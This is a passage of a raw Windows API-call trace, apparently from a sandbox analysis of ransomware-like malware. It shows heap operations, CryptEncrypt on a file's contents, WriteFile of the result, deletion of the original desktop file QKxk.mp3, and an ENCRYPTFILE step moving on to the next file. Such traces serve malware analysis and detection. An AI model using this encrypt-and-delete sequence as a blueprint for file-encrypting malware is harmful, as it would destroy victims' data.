lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.594] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0125.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0125.595] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.595] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0125.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0125.596] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.596] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.596] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0125.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0125.597] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1449e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x144a0) returned 1 [0125.597] CharLowerBuffW (in: lpsz="byte[83105]", cchLength=0xb | out: lpsz="byte[83105]") returned 0xb [0125.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0125.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0125.599] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e790*=0x1449e, dwBufLen=0x144a0 | out: pbData=0x48f0048*, pdwDataLen=0x144e790*=0x144a0) returned 1 [0125.600] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.601] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x144a0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0x144a0, lpOverlapped=0x0) returned 1 [0125.611] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0125.612] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.612] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0125.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0125.612] CryptDestroyKey (hKey=0x41ac100) returned 1 [0125.612] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.612] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.615] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.615] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0125.615] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0125.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.615] FreeLibrary (hLibModule=0x756e0000) returned 1 [0125.615] CloseHandle (hObject=0x2a0) returned 1 [0125.615] CloseHandle (hObject=0x258) returned 1 [0125.623] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3", lpFilePart=0x0) returned 0x20 [0125.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0125.623] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\qkxk.mp3")) returned 0x20 [0125.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0125.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0125.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0125.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0125.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0125.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0125.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0125.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0125.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0125.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0125.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0125.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0125.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0125.624] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dc4f60, ftCreationTime.dwHighDateTime=0x1d5ea39, ftLastAccessTime.dwLowDateTime=0xee99dd0, ftLastAccessTime.dwHighDateTime=0x1d5e81b, ftLastWriteTime.dwLowDateTime=0xee99dd0, ftLastWriteTime.dwHighDateTime=0x1d5e81b, nFileSizeHigh=0x0, nFileSizeLow=0x1449e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="QKxk.mp3", cAlternateFileName="")) returned 0x41ac500 [0125.624] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\qkxk.mp3")) returned 1 [0125.632] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dc4f60, ftCreationTime.dwHighDateTime=0x1d5ea39, ftLastAccessTime.dwLowDateTime=0xee99dd0, ftLastAccessTime.dwHighDateTime=0x1d5e81b, ftLastWriteTime.dwLowDateTime=0xee99dd0, ftLastWriteTime.dwHighDateTime=0x1d5e81b, nFileSizeHigh=0x0, nFileSizeLow=0x1449e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="QKxk.mp3", cAlternateFileName="")) returned 0 [0125.633] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0125.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0125.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0125.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0125.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0125.634] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0125.634] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0125.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0125.634] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0125.634] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0125.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0125.635] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0125.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0125.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0125.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0125.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0125.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0125.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0125.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0125.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0125.636] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0125.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0125.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0125.636] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0125.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0125.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.637] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91ac250, ftCreationTime.dwHighDateTime=0x1d5e92a, ftLastAccessTime.dwLowDateTime=0x37ffae10, ftLastAccessTime.dwHighDateTime=0x1d5e499, ftLastWriteTime.dwLowDateTime=0x37ffae10, ftLastWriteTime.dwHighDateTime=0x1d5e499, nFileSizeHigh=0x0, nFileSizeLow=0x16d36, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="Tj494Ho-BBcDUp1CA.mkv", cAlternateFileName="TJ494H~1.MKV")) returned 0x41ac500 [0125.637] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0125.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0125.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 